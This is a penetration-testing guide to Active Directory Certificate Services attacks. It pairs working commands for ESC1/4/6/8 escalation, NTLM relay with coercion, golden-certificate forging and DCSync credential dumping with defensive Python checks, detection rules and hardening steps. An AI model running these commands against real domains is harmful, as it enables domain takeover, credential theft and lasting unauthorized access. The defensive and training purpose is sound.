ADCS Attacks

Exploit Active Directory Certificate Services misconfigurations to escalate privileges, forge certificates, and establish persistent access to domain resources.

Danger

ADCS attacks can provide long-term persistence: a certificate keeps working until it expires or is revoked, regardless of password changes, and templates often issue for a year or more. Document every certificate obtained (template, requester, SAN, serial number) and coordinate revocation with the client. A forged "golden" certificate never passes through the CA, so revocation cannot touch it; the only remediation is re-keying the CA.

Tool Installation

Certipy

Python ADCS toolkit

pip install certipy-ad

Certify

C# ADCS tool

github.com/GhostPack/Certify

ForgeCert

Forge certificates

github.com/GhostPack/ForgeCert

PassTheCert

Certificate authentication over LDAPS (Schannel) for domains where the DC does not accept PKINIT

github.com/AlmondOffSec

ADCS Enumeration

Find Certificate Authorities

bash
# Certipy - enumerate CAs and templates; -vulnerable keeps only templates/CAs with an ESC finding
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10 -vulnerable -stdout

# Certify - enumerate from a domain-joined Windows host
Certify.exe find
Certify.exe find /vulnerable
Certify.exe find /enrolleeSuppliesSubject

# Windows built-ins - locate the enterprise CAs
# Each enterprise CA is a pKIEnrollmentService object in the Configuration partition;
# dNSHostName is the CA host and certificateTemplates lists what it publishes
certutil -config - -ping
Get-ADObject -Filter 'objectClass -eq "pKIEnrollmentService"' -SearchBase "CN=Configuration,DC=corp,DC=local" -Properties dNSHostName,certificateTemplates

ESC1 - Misconfigured Certificate Templates

ESC1 allows low-privileged users to request certificates for any user by supplying their own Subject Alternative Name (SAN), typically a UPN, in the certificate request. The CA issues the certificate, and the DC maps it to the account named in the SAN.

Information

Vulnerable conditions: the template allows enrollment by low-privileged principals (Domain Users, Authenticated Users, Domain Computers) + the ENROLLEE_SUPPLIES_SUBJECT flag is set + the certificate can be used for authentication (Client Authentication, PKINIT Client Authentication, Smart Card Logon or Any Purpose EKU) + no CA manager approval and no authorized signatures are required. Since KB5014754 (May 2022) the CA embeds the requester's SID in issued certificates, and a DC in Full Enforcement mode rejects a certificate whose SID does not match the account in the SAN; test authentication immediately rather than assuming the certificate works.
bash
# Certipy - request a certificate for the Domain Admin from a low-privileged account
# -target is the CA host; the result is saved as administrator.pfx (named after the UPN)
certipy req -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10 -target ca.corp.local -ca CORP-CA -template VulnTemplate -upn administrator@corp.local

# Authenticate with the certificate: yields a TGT (administrator.ccache) and the account's NT hash
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

# Certify - request from Windows (/ca takes HOST\CA-NAME); Certify prints a PEM key+cert
Certify.exe request /ca:ca.corp.local\CORP-CA /template:VulnTemplate /altname:administrator
# Convert the PEM to PFX (on Linux) and use it with Rubeus
openssl pkcs12 -in cert.pem -keyex -CSP "Microsoft Enhanced Cryptographic Provider v1.0" -export -out cert.pfx
Rubeus.exe asktgt /user:administrator /certificate:cert.pfx /ptt
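The template conditions listed above (and the EKU-based ESC2/ESC3 and EditFlags-based ESC6 checks referenced later on this page) reduce to a few flag bits and OIDs. The following Python is an added example for this page, not Certipy or Certify code: it applies those checks to constructed template records shaped like the pKICertificateTemplate LDAP attributes, with the principals holding the Enroll right already resolved from the ACL (a real run would take them from the security descriptor), and parses a constructed certutil EditFlags dump. The template names, the low-privilege group list and the sample values are assumptions.

```python
import re

# Added example (not Certipy/Certify code): ESC1/ESC2/ESC3 template checks and the
# ESC6 EditFlags check, run over constructed sample data.

# msPKI-Certificate-Name-Flag / msPKI-Enrollment-Flag bits (MS-CRTD)
CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT = 0x00000001
CT_FLAG_PEND_ALL_REQUESTS = 0x00000002       # "CA certificate manager approval"
# CA policy\EditFlags bit that lets a request attribute carry the SAN (ESC6)
EDITF_ATTRIBUTESUBJECTALTNAME2 = 0x00040000

# EKU OIDs that make a certificate usable for AD authentication
AUTH_EKUS = {
    "1.3.6.1.5.5.7.3.2",       # Client Authentication
    "1.3.6.1.5.2.3.4",         # PKINIT Client Authentication
    "1.3.6.1.4.1.311.20.2.2",  # Smart Card Logon
    "2.5.29.37.0",             # Any Purpose
}
ANY_PURPOSE = "2.5.29.37.0"
CERTIFICATE_REQUEST_AGENT = "1.3.6.1.4.1.311.20.2.1"

# Principals treated as "low-privileged" for the enrollment check (assumption)
LOW_PRIV = {"Domain Users", "Authenticated Users", "Domain Computers", "Everyone"}


def classify(t):
    """Return the ESC findings (subset of {ESC1, ESC2, ESC3}) for one template record."""
    if not t["enabled"] or not (LOW_PRIV & set(t["enroll"])):
        return set()
    if t["msPKI-Enrollment-Flag"] & CT_FLAG_PEND_ALL_REQUESTS:
        return set()               # manager approval blocks all three
    if t["msPKI-RA-Signature"] > 0:
        return set()               # authorized signatures required
    ekus = set(t["pKIExtendedKeyUsage"])
    found = set()
    supplies_subject = bool(t["msPKI-Certificate-Name-Flag"] & CT_FLAG_ENROLLEE_SUPPLIES_SUBJECT)
    if supplies_subject and (ekus & AUTH_EKUS):
        found.add("ESC1")
    if not ekus or ANY_PURPOSE in ekus:
        found.add("ESC2")          # no EKU (SubCA-style) or Any Purpose
    if CERTIFICATE_REQUEST_AGENT in ekus:
        found.add("ESC3")          # holder can act as an enrollment agent
    return found


def find_vulnerable(templates):
    """Name -> findings, for templates with at least one finding."""
    return {name: f for name, t in templates.items() if (f := classify(t))}


def parse_editflags(certutil_output):
    """Extract the EditFlags DWORD from `certutil -getreg policy\\EditFlags` output."""
    m = re.search(r"EditFlags\s+REG_DWORD\s*=\s*([0-9a-fA-F]+)", certutil_output)
    return int(m.group(1), 16) if m else None


def ca_is_esc6(editflags):
    return bool(editflags & EDITF_ATTRIBUTESUBJECTALTNAME2)


# Constructed sample templates (values are assumptions, not from a real domain)
TEMPLATES = {
    "VulnTemplate": {"enabled": True, "enroll": ["Domain Users"],
                     "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
                     "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2"]},
    "User": {"enabled": True, "enroll": ["Domain Users"],
             "msPKI-Certificate-Name-Flag": 0xA6000000, "msPKI-Enrollment-Flag": 0x29,
             "msPKI-RA-Signature": 0,
             "pKIExtendedKeyUsage": ["1.3.6.1.5.5.7.3.2", "1.3.6.1.5.5.7.3.4", "1.3.6.1.4.1.311.10.3.4"]},
    "SubCA": {"enabled": True, "enroll": ["Domain Admins"],
              "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x0,
              "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": []},
    "HelpdeskAgent": {"enabled": True, "enroll": ["Authenticated Users"],
                      "msPKI-Certificate-Name-Flag": 0x0, "msPKI-Enrollment-Flag": 0x0,
                      "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["1.3.6.1.4.1.311.20.2.1"]},
    "Approved": {"enabled": True, "enroll": ["Domain Users"],
                 "msPKI-Certificate-Name-Flag": 0x1, "msPKI-Enrollment-Flag": 0x2,
                 "msPKI-RA-Signature": 0, "pKIExtendedKeyUsage": ["2.5.29.37.0"]},
}

# Constructed excerpt modelled on certutil -getreg policy\EditFlags output
CERTUTIL_OUTPUT = """\
  EditFlags REG_DWORD = 15014e (1376590)
    EDITF_REQUESTEXTENSIONLIST -- 2
    EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000 (262144)
CertUtil: -getreg command completed successfully.
"""

if __name__ == "__main__":
    for name, f in find_vulnerable(TEMPLATES).items():
        print(f"{name}: {', '.join(sorted(f))}")
    flags = parse_editflags(CERTUTIL_OUTPUT)
    print(f"EditFlags=0x{flags:x} ESC6={ca_is_esc6(flags)}")
```

Only "VulnTemplate" (ESC1) and "HelpdeskAgent" (ESC3) come back as findings: "User" has no ENROLLEE_SUPPLIES_SUBJECT bit, "SubCA" is not enrollable by low-privileged principals, and "Approved" requires manager approval. The classifier deliberately checks the approval and signature gates first, because Certipy and Certify apply the same gates before reporting any of the three.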

ESC4 - Vulnerable ACLs on Templates

If a low-privileged user has write access to a certificate template object (WriteDACL, WriteOwner or WriteProperty), they can rewrite it into an ESC1 template: set ENROLLEE_SUPPLIES_SUBJECT, add a client-authentication EKU and remove any approval or signature requirement.

bash
# Find templates on which a low-privileged principal holds write rights (reported as ESC4)
certipy find -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10 -vulnerable -stdout

# Overwrite the template with Certipy's ESC1-friendly configuration
# (ENROLLEE_SUPPLIES_SUBJECT set, client-auth EKU, no approval/signatures);
# -save-old writes the current configuration to VulnTemplate.json for restoration
certipy template -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10 -template VulnTemplate -save-old

# Now exploit as ESC1
certipy req -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10 -target ca.corp.local -ca CORP-CA -template VulnTemplate -upn administrator@corp.local

# Restore the original template configuration when done (template changes also log Event 4899/4900)
certipy template -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10 -template VulnTemplate -configuration VulnTemplate.json

ESC6 - EDITF_ATTRIBUTESUBJECTALTNAME2

If the CA has the EDITF_ATTRIBUTESUBJECTALTNAME2 flag set in its policy module EditFlags, it accepts a SAN passed as a request attribute for any template, so every template that low-privileged users can enroll in and that allows client authentication (such as the default User template) becomes an ESC1 equivalent. Certipy's find output shows this as "User Specified SAN: Enabled" on the CA. Since KB5014754 (May 2022) the CA also embeds the requester's SID in such certificates, so DCs enforcing strong certificate mapping reject them; treat ESC6 as exploitable only against unpatched CAs or DCs still in compatibility mode.

bash
# Check the flag (run on the CA or from a host with RSAT; -config takes HOST\CA-NAME)
# Look for "EDITF_ATTRIBUTESUBJECTALTNAME2 -- 40000" under the EditFlags value
certutil -config "ca.corp.local\CORP-CA" -getreg policy\EditFlags

# If enabled, any enrollable client-auth template works; the SAN goes in as a request attribute
certipy req -u user@corp.local -p 'Password123' -dc-ip 10.10.10.10 -target ca.corp.local -ca CORP-CA -template User -upn administrator@corp.local
certipy auth -pfx administrator.pfx -dc-ip 10.10.10.10

ESC8 - NTLM Relay to HTTP Endpoints

The AD CS Web Enrollment site (certsrv) accepts NTLM over HTTP by default and does not enforce signing or channel binding, so NTLM authentication coerced from a machine can be relayed to it to enroll a certificate for that machine account. Coercing a domain controller yields a DC certificate, which in turn gives the DC's TGT and NT hash and therefore DCSync.

bash
# Relay to the web enrollment endpoint; the DomainController template fits a coerced DC
ntlmrelayx.py -t http://ca.corp.local/certsrv/certfnsh.asp -smb2support --adcs --template DomainController

# Coerce the DC to authenticate to the attacker (authenticated PetitPotam; arguments are listener, then target)
python3 PetitPotam.py -u user -p 'Password123' -d corp.local ATTACKER_IP DC_IP

# ntlmrelayx outputs the certificate as base64 PKCS#12 (newer Impacket also writes <account>.pfx)
# Machine certificates carry a dNSName rather than a UPN, so tell certipy the account explicitly
certipy auth -pfx 'DC$.pfx' -username 'DC$' -domain corp.local -dc-ip 10.10.10.10

# The DC$ NT hash (or its ccache) is enough for DCSync
secretsdump.py -hashes :DC_NT_HASH 'corp.local/DC$@dc.corp.local' -just-dc-ntlm

Golden Certificate

With the CA's certificate and private key, forge certificates for any user without the CA ever seeing a request, similar to a Golden Ticket but for PKI. Forged certificates appear in no CA database entry and cannot be revoked; they stay valid until the CA certificate expires or the CA is re-keyed.

bash
# Back up the CA certificate and private key (needs CA administrator rights; writes CORP-CA.pfx)
certipy ca -backup -u admin@corp.local -p 'Password123' -dc-ip 10.10.10.10 -target ca.corp.local -ca CORP-CA

# Forge a certificate for any user; writes administrator_forged.pfx
certipy forge -ca-pfx CORP-CA.pfx -upn administrator@corp.local -subject 'CN=Administrator,CN=Users,DC=corp,DC=local'

# Authenticate with the forged certificate
certipy auth -pfx administrator_forged.pfx -dc-ip 10.10.10.10

🔍 Detection & Prevention

Blue Team Indicators

Detection Opportunities

  • Event 4886 (certificate request received) and 4887 (request approved and certificate issued) on the CA; these require CA auditing to be enabled (Object Access auditing plus certutil -setreg CA\AuditFilter 127). Compare the requester with the template and with any SAN/UPN in the request attributes
  • Event 4768 with Pre-Authentication Type 16 (PKINIT) on the DC: a TGT obtained with a certificate; the event records the certificate issuer, serial number and thumbprint
  • Event 4899/4900: a certificate template or its security descriptor was modified (ESC4)
  • Event 4876/4877: CA database backup started/completed (CA key extraction for a Golden Certificate)
  • SANs or certificate logons naming high-value accounts that differ from the requester
  • Unusual certificate template usage: first use of a template, or enrollment by a principal that never enrolled before
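The detection opportunities above as rules, written as an added example for this page rather than code from the original. Events are dicts holding the fields a SIEM extracts from the Windows event XML; the sample events are constructed, the privileged-account list is a placeholder, and the field names used for the 4899/4900 and 4876/4877 records are assumptions.

```python
# Added example (not from the original page): the detection ideas above as rules
# over constructed event records.

PRIVILEGED = {"administrator", "krbtgt"}    # placeholder watch-list (assumption)
PKINIT_PREAUTH = {"16", "17"}                 # 4768 Pre-Authentication Type: PA-PK-AS-REQ / PA-PK-AS-REP
TEMPLATE_CHANGE = {"4899", "4900"}            # template updated / template security updated (ESC4)
CA_BACKUP = {"4876", "4877"}                  # CA database backup started / completed


def upn_from_san(attributes):
    """Return the UPN from a request-attribute string such as
    'CertificateTemplate:User\\nSAN:upn=administrator@corp.local', or None.
    This is the ESC6 path; an ESC1 SAN sits inside the CSR and is not shown in 4887."""
    for line in attributes.splitlines():
        key, sep, rest = line.partition(":")
        if sep and key.strip().lower() == "san":
            for part in rest.split("&"):            # SAN:upn=...&email=...
                name, _, value = part.partition("=")
                if name.strip().lower() == "upn":
                    return value.strip().lower()
    return None


def account_of(principal):
    """'CORP\\lowpriv' -> 'lowpriv'; 'lowpriv@corp.local' -> 'lowpriv'."""
    return principal.split("\\")[-1].split("@")[0].lower()


def analyse(events):
    """Return (rule, actor, detail) tuples for events worth an analyst's attention."""
    alerts = []
    for e in events:
        eid = e["EventID"]
        if eid == "4887" and e.get("Disposition", "Issued") == "Issued":
            san_upn = upn_from_san(e.get("Attributes", ""))
            if san_upn and account_of(san_upn) != account_of(e["Requester"]):
                alerts.append(("SAN_MISMATCH", e["Requester"], san_upn))
        elif eid == "4768" and e.get("PreAuthType") in PKINIT_PREAUTH:
            if e["TargetUserName"].lower() in PRIVILEGED:
                alerts.append(("PRIV_CERT_LOGON", e["TargetUserName"], e.get("CertIssuerName", "")))
        elif eid in TEMPLATE_CHANGE:
            alerts.append(("TEMPLATE_MODIFIED", e.get("SubjectUserName", "?"), e.get("TemplateName", "?")))
        elif eid in CA_BACKUP:
            alerts.append(("CA_KEY_BACKUP", e.get("SubjectUserName", "?"), e.get("CAName", "?")))
    return alerts


# Constructed sample events (field names for 4900/4876 are assumptions)
EVENTS = [
    {"EventID": "4887", "Requester": "CORP\\lowpriv", "Disposition": "Issued",
     "Attributes": "CertificateTemplate:User\nSAN:upn=administrator@corp.local"},
    {"EventID": "4887", "Requester": "CORP\\alice", "Disposition": "Issued",
     "Attributes": "CertificateTemplate:User"},
    {"EventID": "4768", "TargetUserName": "administrator", "PreAuthType": "16",
     "CertIssuerName": "CORP-CA", "CertSerialNumber": "1a00000004", "IpAddress": "10.10.14.5"},
    {"EventID": "4768", "TargetUserName": "alice", "PreAuthType": "2"},       # password pre-auth, ignored
    {"EventID": "4900", "SubjectUserName": "lowpriv", "TemplateName": "VulnTemplate"},
    {"EventID": "4876", "SubjectUserName": "lowpriv", "CAName": "CORP-CA"},
]

if __name__ == "__main__":
    for rule, actor, detail in analyse(EVENTS):
        print(f"{rule:18} {actor:20} {detail}")
```

The SAN_MISMATCH rule only sees SANs passed as request attributes (the ESC6 path); an ESC1 certificate carries its SAN inside the CSR, which is why the PRIV_CERT_LOGON rule on 4768 matters: it fires when the certificate is used, however it was obtained. In production, replace the placeholder watch-list with the accounts that matter in the environment and correlate 4768's serial number back to the CA database with certutil -view.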

Prevention Measures

  • Audit certificate templates for misconfigurations (Certipy find -vulnerable, Certify find /vulnerable) and re-audit after every template change
  • Remove ENROLLEE_SUPPLIES_SUBJECT where not needed so the subject is built from the requester's AD object
  • Require CA certificate manager approval or authorized signatures for sensitive templates
  • Clear EDITF_ATTRIBUTESUBJECTALTNAME2 on the CA (certutil -setreg policy\EditFlags -EDITF_ATTRIBUTESUBJECTALTNAME2, then restart certsvc)
  • Remove Web Enrollment if unused; otherwise serve it over HTTPS only, enable Extended Protection for Authentication (EPA) on the IIS site and disable NTLM on it
  • Enforce strong certificate mapping on DCs (KB5014754, StrongCertificateBindingEnforcement = 2) so certificates without a matching SID are rejected

ESC Vulnerability Reference

ESC  | Vulnerability              | Requirements
ESC1 | Enrollee supplies subject  | Low-privileged enrollment + ENROLLEE_SUPPLIES_SUBJECT + authentication EKU, no approval or signatures required
ESC2 | Any Purpose EKU            | Enrollable template with the Any Purpose EKU or no EKU at all
ESC3 | Enrollment agent template  | Enrollable template with the Certificate Request Agent EKU, plus a template that accepts agent-signed requests
ESC4 | Template ACL abuse         | Write access (WriteDACL, WriteOwner or WriteProperty) on the template object
ESC5 | PKI object control         | Control over PKI-related AD objects (the CA server's computer object or objects under CN=Public Key Services)
ESC6 | EDITF flag enabled         | EDITF_ATTRIBUTESUBJECTALTNAME2 set in the CA's policy EditFlags, so a request attribute can carry the SAN
ESC7 | CA ACL abuse               | ManageCA or ManageCertificates rights on the CA
ESC8 | NTLM relay to HTTP         | Web Enrollment (or CES) reachable over HTTP without EPA, so coerced NTLM authentication can be relayed

External Resources

Practice Labs

Practice ADCS attacks in safe environments:

  • Escape (Hack The Box, medium): ADCS, ESC1, certificate authentication
  • Certified (Hack The Box, medium): ADCS, ESC7, Golden Certificate
  • Timelapse (Hack The Box, easy): certificate authentication, LAPS
  • AD CS (TryHackMe, hard): ADCS introduction, ESC1-ESC8